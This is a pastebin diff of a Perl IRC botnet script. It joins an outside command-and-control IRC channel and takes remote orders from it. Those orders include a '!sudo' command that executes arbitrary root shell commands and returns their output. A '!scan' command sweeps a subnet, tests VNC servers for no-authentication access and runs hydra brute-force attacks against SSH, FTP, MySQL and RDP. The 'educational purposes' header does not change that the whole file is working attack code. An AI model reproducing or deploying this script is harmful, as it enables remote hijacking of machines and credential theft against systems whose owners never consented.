View difference between Paste ID: <a href="/7mUe2MCR">7mUe2MCR</a> and <a href="/jfY8BNYZ">jfY8BNYZ</a>

#For educational purposes or for use on your network only
1		#For educational purposes or for use on your network only
2		#This script has been modified from the original source.
3		#Thanks to the real owner of it.
4		#Get on my IRC Network if you need explainations on how you can use this script.
5
6
7		use IO::Socket;
8		use IO::Socket::INET;
9		use threads;
10		use threads::shared;
11		use Errno qw(EAGAIN);
12		use warnings;
13		my $lines;
14		our @results : shared;
15		our $todo = 0;
16		our $contatore = 0;
17		my $orig_thread = "yes";
18		my $start;
19		my $end;
20		my $out_file;
21		my $range = 99999;
22		my $random_number = int(rand($range));
23		my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/;
24		my @hydra_PORTS = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
25		my $splits = 8; # Creates 2^N processes.
26		our $subnet;
27		my $nick = "b0t$random_number";# nick
28		my $secureport = "6667";
29		my $ircnet = "irc-1.iownyour.biz";
30		my $canale = "#powercc";
31		my $answer;
32		my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n";
33		$sk->autoflush(1);
34		print $sk "USER $nick 0 * :Robot made by independent \r\n";
35		print $sk "NICK $nick \r\n";
36
37		while ($answer = <$sk>) {
38
39		if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests
40		{
41
42		print $sk "PONG ".$1."\r\n";
43		print $sk "JOIN $canale \r\n";
44		}
45		if ($answer=~ /!help/) {
46		printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
47		}
48		if ($answer=~ /!list/)
49		{
50
51		my $file = 'xploits.log';
52		open my $fh, '<', $file or warn "Could not open '$file' $!\n";
53
54		while (my $lines = <$fh>) {
55		chomp $lines;
56		if ($lines=~ /host/) {
57		printa("$lines");
58		}
59		}
60		}
61		if ($answer=~ /!reload/)
62		{
63		printa("Reloading...");
64		my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra");
65		system(@cmd);
66		}
67		if ($answer=~ /!die/)
68		{
69		printa("Dying...");
70		my @cmd = ("sudo pkill perl && sudo pkill hydra");
71		system(@cmd);
72		}
73		if ($answer=~ /!sudo\s+(.*)/)
74		{
75		my $command = $1;
76		printa("Done: $command ");
77		my $cmd = "sudo $command";
78		my @output = `$cmd 2>&1 3>&1`;
79		foreach(@output) {
80		printa("$_\r\n");
81		}
82		}
83
84
85		if ($answer=~ /!scan (.+)/)
86		{
87
88
89		$todo = 0;
90		$subnet = $1;
91		if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
92		$subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
93		$subnet .= ".";
94		printa("Scanning subnet ${subnet}x\n");
95
96		CHECK: {
97		unless ($splits >= 0 && $splits <= 8) {
98		die "ERROR: Do not split $splits times--that makes no sense.\n";
99		}
100		}
101
102		# Ugly, but this works.
103		DivideWork() if $splits >= 1;
104		DivideWork() if $splits >= 2;
105		DivideWork() if $splits >= 3;
106		DivideWork() if $splits >= 4;
107		DivideWork() if $splits >= 5;
108		DivideWork() if $splits >= 6;
109		DivideWork() if $splits >= 7;
110		DivideWork() if $splits >= 8;
111
112		$start = $todo << (8 - $splits);
113		$end = $start + (256 / (2**$splits)) - 1;
114
115		foreach ($start .. $end) {
116
117		Scan_ALL($_);
118
119		}
120		}
121
122		else {
123		printa("Are you brain-dead? Use a correct IP format. ");
124		}
125
126		}
127
128		}
129		####################################
130
131		sub DivideWork {
132		my $pid;
133
134		FORK: {
135		$todo *= 2;
136		if ($pid = fork) {
137		# Parent
138		++$todo;
139
140		} elsif (defined $pid) {
141		# Child
142		$orig_thread = "no";
143
144		} elsif ($! == EAGAIN) {
145		# Recoverable forking error.
146		sleep 7;
147		redo FORK;
148
149		} else {
150		# Unable to fork.
151		printa("Unable to fork: $!\n");
152
153		}
154		}
155		}
156
157
158
159		sub Scan_ALL {
160		my $hostnum = shift;
161		my $host = $subnet . $hostnum;
162		my $sock;
163		my $proto_ver;
164		my $ignored;
165		my $auth_type;
166		my $sec_types;
167		my $vnc_data;
168		$host or printa("ERROR: missing Host IP address Scan_ALL.");
169
170		# The host numbers .0 and .255 are reserved; ignore them.
171		if ($hostnum <= 0 or $hostnum >= 255) { return; }
172
173		# Format things nicely--that crazy formula just adds spaces.
174		$results[$hostnum] = "$host";
175		$results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
176		foreach my $porti (@VNC_PORTS)
177		{
178		if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) {
179
180		$sock->read($proto_ver, 12);
181		print $sock $proto_ver;
182
183		# Get supported security types and ignore them.
184		$sock->read($sec_types, 1);
185
186		$sock->read($ignored, unpack('C', $sec_types));
187		# Claim that we only support no authentication.
188		print $sock "\x01";
189
190
191		# We should get "0000" back, indicating that they won't fall back to no authentication.
192		$sock->read($auth_type, 4);
193
194		# Client initialize.
195		print $sock "\x01";
196
197		# If the server starts sending data, we're in.
198		$sock->read($vnc_data, 4);
199		printa("[Xploiting VNC] $host");
200		if (unpack('I', $vnc_data)) {
201		$results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
202		printa("9,3 [ $porti ] $results[$hostnum] $porti ");
203		}
204		}
205		}
206		foreach my $porti (@hydra_PORTS)
207		{
208		if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) {
209		close($sock);
210		printa("[Cracking " . $porti->[1] . "] $host");
211		my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log");
212		system(@cmdhydra);
213		return;
214		}
215		}
216
217		close($sock);
218		return;
219		}
220
221		sub printa {
222		print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
223		}